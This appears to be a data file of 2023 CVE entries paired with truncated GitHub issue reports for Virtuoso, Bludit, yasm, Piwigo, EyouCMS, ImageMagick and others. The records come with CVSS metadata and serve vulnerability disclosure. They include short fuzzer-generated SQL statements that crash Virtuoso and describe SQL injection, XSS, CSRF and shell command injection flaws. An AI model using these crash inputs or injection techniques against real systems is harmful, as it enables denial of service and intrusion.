The PoC is generated by my DBMS fuzzer. ```SQL CREATE TABLE mvtest_pdt1 AS (SELECT 1 AS col1) WITH DATA; ``` backtrace: ```c #0 0x70d571 (sqlo_query_spec+0x41) #1 0x7da2d4 (sqlc_insert+0x13b4) #2 0x6b7387 (sql_stmt_comp+0x987) #3 0x6ba122 (sql_compile_1+0x1a62) #4 0x68276d (bif_exec+0x67d) #5 0x74b044 (ins_c...
virtuoso 7.2.9 crashed at sqlo_query_spec
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1138/comments
0
2023-04-12T19:38:44Z
2023-04-14T08:12:16Z
https://github.com/openlink/virtuoso-opensource/issues/1138
1,665,134,343
1,138
CVE-2023-31631
2023-05-15T15:15:12.777
An issue in the sqlo_preds_contradiction component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/openlink/virtuoso-opensource/issues/1137" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*", "matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3", "versionEndExcluding": null, "versionEndIncluding": null, "vers...
https://github.com/openlink/virtuoso-opensource/issues/1137
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "openlink", "virtuoso-opensource" ]
The PoC is generated by my DBMS fuzzer. ```SQL CREATE VIEW t1(a) AS SELECT 1; SELECT a, a, a FROM t1 WHERE a IN (1,5) AND a IN (9,8,3025,1000,3969) ORDER BY a, a DESC; ``` backtrace: ```c #0 0x6f6462 (sqlo_preds_contradiction+0x442) #1 0x6fec43 (sqlo_place_table+0xe23) #2 0x706bab (sqlo_try+0xdb) #3 0...
virtuoso 7.2.9 crashed at sqlo_preds_contradiction
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1137/comments
0
2023-04-12T19:36:18Z
2023-04-14T08:12:15Z
https://github.com/openlink/virtuoso-opensource/issues/1137
1,665,131,513
1,137
CVE-2023-31698
2023-05-17T13:15:09.463
Bludit v3.14.1 is vulnerable to Stored Cross Site Scripting (XSS) via SVG file on site logo. NOTE: the product's security model is that users are trusted by the administrator to insert arbitrary content (users cannot create their own accounts through self-registration).
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/172462/Bludit-CMS-3.14.1-Cross-Site-Scripting.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/bludit/...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:bludit:bludit:3.14.1:*:*:*:*:*:*:*", "matchCriteriaId": "E1884F54-CD39-43CC-B52B-8B2335A09CDB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludi...
https://github.com/bludit/bludit/issues/1212#issuecomment-649514491
null
github.com
[ "bludit", "bludit" ]
### Describe your problem https://github.com/bludit/bludit/blob/master/bl-kernel/ajax/logo-upload.php Logo upload only determines the suffix, but not the content, which causes XSS and the user can inject any javascript and html code in the page payload ![image](https://user-images.githubusercontent.com/8120951...
Store XSS
https://api.github.com/repos/bludit/bludit/issues/1212/comments
10
2020-06-19T07:23:19Z
2022-02-22T16:10:21Z
https://github.com/bludit/bludit/issues/1212
641,764,976
1,212
CVE-2023-31698
2023-05-17T13:15:09.463
Bludit v3.14.1 is vulnerable to Stored Cross Site Scripting (XSS) via SVG file on site logo. NOTE: the product's security model is that users are trusted by the administrator to insert arbitrary content (users cannot create their own accounts through self-registration).
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/172462/Bludit-CMS-3.14.1-Cross-Site-Scripting.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/bludit/...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:bludit:bludit:3.14.1:*:*:*:*:*:*:*", "matchCriteriaId": "E1884F54-CD39-43CC-B52B-8B2335A09CDB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludi...
https://github.com/bludit/bludit/issues/1369#issuecomment-940806199
null
github.com
[ "bludit", "bludit" ]
Hi i have identified a security vulnerability in your application. Kindly do let me know if we can discuss this in detail.
Alert: Vulnerability in bludit
https://api.github.com/repos/bludit/bludit/issues/1369/comments
6
2021-10-08T11:24:40Z
2021-10-19T07:40:57Z
https://github.com/bludit/bludit/issues/1369
1,020,989,213
1,369
CVE-2023-31698
2023-05-17T13:15:09.463
Bludit v3.14.1 is vulnerable to Stored Cross Site Scripting (XSS) via SVG file on site logo. NOTE: the product's security model is that users are trusted by the administrator to insert arbitrary content (users cannot create their own accounts through self-registration).
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/172462/Bludit-CMS-3.14.1-Cross-Site-Scripting.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/bludit/...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:bludit:bludit:3.14.1:*:*:*:*:*:*:*", "matchCriteriaId": "E1884F54-CD39-43CC-B52B-8B2335A09CDB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludi...
https://github.com/bludit/bludit/issues/1509
[ "Exploit" ]
github.com
[ "bludit", "bludit" ]
**Description:** I found Stored Cross-site scripting (XSS) vulnerability in your Bludit - Flat-File CMS (v3.14.1) on "General" settings to "Logo" field. When I send malicious code use svg file after then the browser give me result. **CMS Version:** v3.14.1 **Affected URL:** http://127.0.0.1/bludit/admin/settin...
Stored XSS via SVG file Vulnerability on Bludit v3.14.1
https://api.github.com/repos/bludit/bludit/issues/1509/comments
2
2023-04-14T22:43:13Z
2023-07-10T21:54:40Z
https://github.com/bludit/bludit/issues/1509
1,669,025,725
1,509
CVE-2023-31723
2023-05-17T15:15:08.873
yasm 1.3.0.55.g101bc was discovered to contain a segmentation violation via the function expand_mmac_params at /nasm/nasm-pp.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/DaisyPo/fuzzing-vulncollect/blob/main/yasm/SEGV/nasm-pp.c:4008%20in%20expand_mmac_params/README.md" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue T...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:yasm_project:yasm:1.3.0.55.g101bc:*:*:*:*:*:*:*", "matchCriteriaId": "4A03B4FD-736D-40B7-87B0-AC4EF2660C4B", "versionEndExcluding": null, "versionEndIncluding": null, "versio...
https://github.com/yasm/yasm/issues/220
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "yasm", "yasm" ]
# There exists SEGV in yasm/modules/preprocs/nasm/nasm-pp.c:4008 in expand_mmac_params ## asan info: ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==3645333==ERROR: AddressSanitizer: SEGV on unknown address 0x60bcf518f500 (pc 0x562c742f3049 bp 0x7ffc6fb07330 ...
There exists SEGV in yasm/modules/preprocs/nasm/nasm-pp.c:4008 in expand_mmac_params
https://api.github.com/repos/yasm/yasm/issues/220/comments
1
2023-04-17T16:18:19Z
2024-03-22T11:52:08Z
https://github.com/yasm/yasm/issues/220
1,671,545,980
220
CVE-2023-31724
2023-05-17T15:15:08.917
yasm 1.3.0.55.g101bc was discovered to contain a segmentation violation via the function do_directive at /nasm/nasm-pp.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrit...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/DaisyPo/fuzzing-vulncollect/tree/main/yasm/SEGV/nasm-pp.c:3570%20in%20do_directive" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:yasm_project:yasm:1.3.0.55.g101bc:*:*:*:*:*:*:*", "matchCriteriaId": "4A03B4FD-736D-40B7-87B0-AC4EF2660C4B", "versionEndExcluding": null, "versionEndIncluding": null, "versio...
https://github.com/yasm/yasm/issues/222
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "yasm", "yasm" ]
# There exists SEGV in yasm/modules/preprocs/nasm/nasm-pp.c:3570 in do_directive ## asan info: ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==1433063==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55736a1a1cff bp 0x7fff4d5cbf50 sp 0x7ff...
There exists SEGV in yasm/modules/preprocs/nasm/nasm-pp.c:3570 in do_directive
https://api.github.com/repos/yasm/yasm/issues/222/comments
1
2023-04-17T16:48:59Z
2024-03-22T11:50:46Z
https://github.com/yasm/yasm/issues/222
1,671,589,854
222
CVE-2023-31725
2023-05-17T15:15:08.957
yasm 1.3.0.55.g101bc was discovered to contain a heap-use-after-free via the function expand_mmac_params at yasm/modules/preprocs/nasm/nasm-pp.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/DaisyPo/fuzzing-vulncollect/tree/main/yasm/heap-use-after-free/nasm-pp.c:3878%20in%20expand_mmac_params" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Is...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:yasm_project:yasm:1.3.0.55.g101bc:*:*:*:*:*:*:*", "matchCriteriaId": "4A03B4FD-736D-40B7-87B0-AC4EF2660C4B", "versionEndExcluding": null, "versionEndIncluding": null, "versio...
https://github.com/yasm/yasm/issues/221
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "yasm", "yasm" ]
# There exists heap-use-after-free in yasm/modules/preprocs/nasm/nasm-pp.c:3878 in expand_mmac_params ## asan info: ``` ==708699==ERROR: AddressSanitizer: heap-use-after-free on address 0x60e0000012a8 at pc 0x55647c385147 bp 0x7ffe09f5d870 sp 0x7ffe09f5d860 READ of size 8 at 0x60e0000012a8 thread T0 #0 0x556...
There exists heap-use-after-free in yasm/modules/preprocs/nasm/nasm-pp.c:3878 in expand_mmac_params
https://api.github.com/repos/yasm/yasm/issues/221/comments
1
2023-04-17T16:39:42Z
2024-03-22T11:51:42Z
https://github.com/yasm/yasm/issues/221
1,671,576,475
221
CVE-2023-27233
2023-05-17T20:15:09.933
Piwigo before 13.6.0 was discovered to contain a SQL injection vulnerability via the order[0][dir] parameter at user_list_backend.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gist.github.com/renanavs/dcb13bb1cd618ce7eb0c80290b837245" }, { "source": "cve@mitre.org", "tags": [ "Release Notes" ], "url": "https://github.com/Piwigo/Piwigo/issues/18...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:piwigo:piwigo:*:*:*:*:*:*:*:*", "matchCriteriaId": "86097A18-F13B-45AC-B24B-5A879C3A2DE2", "versionEndExcluding": "13.6.0", "versionEndIncluding": null, "versionStartExcludin...
https://github.com/Piwigo/Piwigo/issues/1872
[ "Release Notes" ]
github.com
[ "Piwigo", "Piwigo" ]
Without entering too much into details there is a possible SQL injection in file `admin/user_list_backend.php`. This file has no reason to be still in Piwigo since version 12 and the new user manager (which relies on `ws.php` as backend). This file must simply be removed.
[13.x] SQL injection on user_list_backend.php
https://api.github.com/repos/Piwigo/Piwigo/issues/1872/comments
0
2023-02-24T08:42:01Z
2023-02-24T08:42:44Z
https://github.com/Piwigo/Piwigo/issues/1872
1,598,184,264
1,872
CVE-2023-31708
2023-05-23T01:15:09.960
A Cross-Site Request Forgery (CSRF) in EyouCMS v1.6.2 allows attackers to execute arbitrary commands via a supplying a crafted HTML file to the Upload software format function.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "inte...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/weng-xianhu/eyoucms/issues/41" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:eyoucms:eyoucms:1.6.2:*:*:*:*:*:*:*", "matchCriteriaId": "5B87F220-D05C-4885-8C0E-E5BD8D8DFB66", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
https://github.com/weng-xianhu/eyoucms/issues/41
[ "Exploit", "Issue Tracking" ]
github.com
[ "weng-xianhu", "eyoucms" ]
let's see the operation: First,we should add the js and html in "Upload software format" . Second,we clicked the submit,and use Burp suite to Intercept the packet. <img width="1251" alt="屏幕截图 2023-04-16 170400" src="https://user-images.githubusercontent.com/60973265/232288495-074b92f6-7789-4a20-879d-ef7fd31a3a08.p...
Three csrf vulnerabilities, you can modify Settings, you can delete articles, you can delete users
https://api.github.com/repos/weng-xianhu/eyoucms/issues/41/comments
0
2023-04-16T10:54:52Z
2024-03-22T06:50:30Z
https://github.com/weng-xianhu/eyoucms/issues/41
1,669,861,738
41
CVE-2023-33359
2023-05-23T14:15:09.813
Piwigo 13.6.0 is vulnerable to Cross Site Request Forgery (CSRF) in the "add tags" function.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "inte...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/Piwigo/Piwigo/issues/1908" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:piwigo:piwigo:13.6.0:*:*:*:*:*:*:*", "matchCriteriaId": "B279DE47-F1F5-4BB9-A47B-1C9B73DD9076", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludi...
https://github.com/Piwigo/Piwigo/issues/1908
[ "Exploit", "Issue Tracking" ]
github.com
[ "Piwigo", "Piwigo" ]
This vulnerability lies in the 'add tags' function in the backend. ![image](https://user-images.githubusercontent.com/27283436/235408051-ac0c44e8-32e0-4912-a260-83f0b8891db2.png) Try creating a new label here. ![image](https://user-images.githubusercontent.com/27283436/235408127-ba083289-7885-4be2-8ce4-942db7401af...
There is a CSRF vulnerability in the "add tags" function of piwigo
https://api.github.com/repos/Piwigo/Piwigo/issues/1908/comments
3
2023-05-01T04:58:37Z
2023-05-05T08:07:10Z
https://github.com/Piwigo/Piwigo/issues/1908
1,690,372,075
1,908
CVE-2023-33361
2023-05-23T14:15:09.863
Piwigo 13.6.0 is vulnerable to SQL Injection via /admin/permalinks.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "in...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/Piwigo/Piwigo/issues/1910" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:piwigo:piwigo:13.6.0:-:*:*:*:*:*:*", "matchCriteriaId": "C0F29243-1953-4593-9D93-65BAF0D5D0EB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludi...
https://github.com/Piwigo/Piwigo/issues/1910
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "Piwigo", "Piwigo" ]
Before replicating this vulnerability, you need to first create a new album and access the "photos_add" function, and choose to create a new album ![image](https://user-images.githubusercontent.com/27283436/235838268-ab39be83-c3da-446c-bb35-714a9dfd6c7d.png) //like this ![image](https://user-images.githubusercontent...
There is a SQL Injection in the "permalinks" function of piwigo
https://api.github.com/repos/Piwigo/Piwigo/issues/1910/comments
0
2023-05-03T06:02:27Z
2023-05-05T08:24:43Z
https://github.com/Piwigo/Piwigo/issues/1910
1,693,458,747
1,910
CVE-2023-33362
2023-05-23T14:15:09.917
Piwigo 13.6.0 is vulnerable to SQL Injection via in the "profile" function.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "in...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/Piwigo/Piwigo/issues/1911" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:piwigo:piwigo:13.6.0:*:*:*:*:*:*:*", "matchCriteriaId": "B279DE47-F1F5-4BB9-A47B-1C9B73DD9076", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludi...
https://github.com/Piwigo/Piwigo/issues/1911
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "Piwigo", "Piwigo" ]
Accessing the 'profile' page ![image](https://user-images.githubusercontent.com/27283436/236197441-196a43d0-f0ba-43ac-9448-f029bec196c7.png) Add the 'user_id' parameter with single quotes ![image](https://user-images.githubusercontent.com/27283436/236197644-ae97d84c-4296-4721-aa16-b21665c9500e.png) Discovering ...
There is a SQL Injection in the "profile" function of piwigo
https://api.github.com/repos/Piwigo/Piwigo/issues/1911/comments
0
2023-05-04T12:22:34Z
2023-05-05T08:25:03Z
https://github.com/Piwigo/Piwigo/issues/1911
1,695,904,246
1,911
CVE-2023-34151
2023-05-30T22:15:11.000
A vulnerability was found in ImageMagick. This security flaw ouccers as an undefined behaviors of casting double to size_t in svg, mvg and other coders (recurring bugs of CVE-2022-32546).
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integr...
[ { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/security/cve/CVE-2023-34151" }, { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "81FC97E7-D26F-47A4-A0D3-0E957026718D", "versionEndExcluding": "7.1.1.11", "versionEndIncluding": null, "versionS...
https://github.com/ImageMagick/ImageMagick/issues/6341
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### ImageMagick version 7.1.30-0 ### Operating system Linux ### Operating system, version and so on Any ### Description While reviewing historical vulnerabilities, I discovered several similar bugs just like issue #4985 which was later assigned CVE-2022-32546. The original vulnerability relates ...
Undefined behaviors of casting `double` to `size_t` in svg, mvg and other coders (recurring bugs of CVE-2022-32546)
https://api.github.com/repos/ImageMagick/ImageMagick/issues/6341/comments
32
2023-05-17T11:25:22Z
2024-05-13T17:50:37Z
https://github.com/ImageMagick/ImageMagick/issues/6341
1,713,682,055
6,341
CVE-2023-34152
2023-05-30T22:15:11.070
A vulnerability was found in ImageMagick. This security flaw cause a remote code execution vulnerability in OpenBlob with --enable-pipes configured.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "in...
[ { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/security/cve/CVE-2023-34152" }, { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "81FC97E7-D26F-47A4-A0D3-0E957026718D", "versionEndExcluding": "7.1.1.11", "versionEndIncluding": null, "versionS...
https://github.com/ImageMagick/ImageMagick/issues/6339
[ "Exploit", "Issue Tracking", "Patch", "Vendor Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### ImageMagick version 6.9.6-4 ### Operating system Linux ### Operating system, version and so on Any ### Description While reviewing historical vulnerabilities, I discovered an aribitary code execution vulnerability (shell command injection) in `OpenBlob`, which is actually an incomplete fix to C...
RCE (shell command injection) vulnerability in `OpenBlob` with `--enable-pipes` configured
https://api.github.com/repos/ImageMagick/ImageMagick/issues/6339/comments
10
2023-05-17T09:47:04Z
2024-07-11T08:49:30Z
https://github.com/ImageMagick/ImageMagick/issues/6339
1,713,528,731
6,339
CVE-2023-34153
2023-05-30T22:15:11.143
A vulnerability was found in ImageMagick. This security flaw causes a shell command injection vulnerability via video:vsync or video:pixel-format options in VIDEO encoding/decoding.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrit...
[ { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/security/cve/CVE-2023-34153" }, { "source": "secalert@redhat.com", "tags": [ "Issue Tracking" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2210660" }, ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "81FC97E7-D26F-47A4-A0D3-0E957026718D", "versionEndExcluding": "7.1.1.11", "versionEndIncluding": null, "versionS...
https://github.com/ImageMagick/ImageMagick/issues/6338
[ "Exploit", "Issue Tracking", "Patch", "Vendor Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### ImageMagick version 7.1.0-1 ### Operating system Linux ### Operating system, version and so on Any ### Description In reviewing historical vulnerabilities in ImageMagick, I discovered a shell command injection vulnerability in encoding/decoding VIDEO files, which very much resembles CVE-2020-29...
Shell command injection vulnerability via `video:vsync` or `video:pixel-format` options in VIDEO encoding/decoding.
https://api.github.com/repos/ImageMagick/ImageMagick/issues/6338/comments
2
2023-05-17T08:50:05Z
2024-01-23T11:25:13Z
https://github.com/ImageMagick/ImageMagick/issues/6338
1,713,432,787
6,338
CVE-2023-2878
2023-06-07T15:15:09.377
Kubernetes secrets-store-csi-driver in versions before 1.3.3 discloses service account tokens in logs.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integr...
[ { "source": "jordan@liggitt.net", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/kubernetes/kubernetes/issues/118419" }, { "source": "jordan@liggitt.net", "tags": [ "Mailing List" ], "url": "https://groups.google.com/g/kubernetes-security-an...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:secrets-store-csi-driver:*:*:*:*:*:*:*:*", "matchCriteriaId": "FE39B6E7-61B5-482B-953C-BA5441CD85C7", "versionEndExcluding": "1.3.3", "versionEndIncluding": null, ...
https://github.com/kubernetes/kubernetes/issues/118419
[ "Exploit", "Issue Tracking" ]
github.com
[ "kubernetes", "kubernetes" ]
A security issue was discovered in [secrets-store-csi-driver](https://github.com/kubernetes-sigs/secrets-store-csi-driver) where an actor with access to the driver logs could observe service account tokens. These tokens could then potentially be exchanged with external cloud providers to access secrets stored in cloud ...
CVE-2023-2878: secrets-store-csi-driver discloses service account tokens in logs
https://api.github.com/repos/kubernetes/kubernetes/issues/118419/comments
1
2023-06-02T19:03:54Z
2023-06-02T19:04:34Z
https://github.com/kubernetes/kubernetes/issues/118419
1,738,671,677
118,419
CVE-2023-33557
2023-06-09T18:15:09.693
Fuel CMS v1.5.2 was discovered to contain a SQL injection vulnerability via the id parameter at /controllers/Blocks.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/bcvgh/fuel-cms-sqlinjection/blob/main/README.md" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url":...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:thedaylightstudio:fuel_cms:1.5.2:*:*:*:*:*:*:*", "matchCriteriaId": "E3A44312-83D2-4421-9A35-3FD048EA578A", "versionEndExcluding": null, "versionEndIncluding": null, "version...
https://github.com/daylightstudio/FUEL-CMS/issues/604
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "daylightstudio", "FUEL-CMS" ]
login required. fuel/modules/fuel/controllers/Blocks.php line 64 import_view method starts Line 70 receives the id parameter of the post request and enters the import method ![image](https://github.com/daylightstudio/FUEL-CMS/assets/56790427/beda0025-4ba5-4d04-9ad3-f9b5712fdcc3) fuel/modules/fuel/librari...
FUEL CMS 1.5.2 allows SQL Injection via parameter 'id' in fuel/modules/fuel/controllers/Blocks.php
https://api.github.com/repos/daylightstudio/FUEL-CMS/issues/604/comments
2
2023-05-12T02:24:19Z
2023-05-12T15:50:17Z
https://github.com/daylightstudio/FUEL-CMS/issues/604
1,706,820,945
604
CVE-2023-33492
2023-06-12T13:15:10.300
EyouCMS 1.6.2 is vulnerable to Cross Site Scripting (XSS).
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/weng-xianhu/eyoucms/issues/42" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:eyoucms:eyoucms:1.6.2:*:*:*:*:*:*:*", "matchCriteriaId": "5B87F220-D05C-4885-8C0E-E5BD8D8DFB66", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
https://github.com/weng-xianhu/eyoucms/issues/42
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "weng-xianhu", "eyoucms" ]
EyouCMS v1.6.2 has a vulnerability that stores cross-site scripting ![image](https://user-images.githubusercontent.com/103560725/235909677-06807c10-1417-49ff-9b04-824e7cc1602d.png) ![image](https://user-images.githubusercontent.com/103560725/235909761-be021669-70f3-41e6-9337-7d04d805f0f8.png) ![image](https://user-i...
EyouCMS v1.6.2 has a vulnerability that stores cross-site scripting
https://api.github.com/repos/weng-xianhu/eyoucms/issues/42/comments
0
2023-05-03T12:02:15Z
2024-03-22T06:50:30Z
https://github.com/weng-xianhu/eyoucms/issues/42
1,693,938,455
42
CVE-2023-35116
2023-06-14T14:15:10.960
jackson-databind through 2.15.2 allows attackers to cause a denial of service or other unspecified impact via a crafted object that uses cyclic dependencies. NOTE: the vendor's perspective is that this is not a valid vulnerability report, because the steps of constructing a cyclic data structure and trying to serialize...
